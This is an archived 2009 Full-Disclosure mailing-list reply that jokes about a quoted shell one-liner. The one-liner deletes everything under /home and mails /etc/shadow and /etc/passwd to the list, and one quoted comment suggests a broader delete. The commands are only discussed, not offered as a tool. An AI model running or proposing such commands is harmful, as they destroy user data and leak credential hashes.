OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: [Full-disclosure] seriously, your code

A.L.M.Buxeylboro.ac.uk
Date: Thu Jul 16 2009 - 03:07:08 CDT


Hi,

> /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehecat /etc/shadow |mail
> full-disclosurelists.grok.org.uk cat /etc/passwd |mail
> full-disclosurelists.grok.org.uk
>
> first off if you want to do damage rm -R dumb ass, the one you posted
> only removes files in /home
>

perhaps it was *designed* to only delete files from /home = because
if you did a full recursive nasty delete of the whole filesystem
then , not only would there not be a /etc/shadow to mail out, but
also the mail command would not work - and if, by miracle, the command
did work then the mail wouldnt go anywhere because the mailspool dir would
not exist etc....and if, by some crazy broken-system way anything ever
did get off the box, then there wouldnt actually be a box worth logging
into remotely using any credentials that might be in /etc/shadow anyway ;-)

alan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/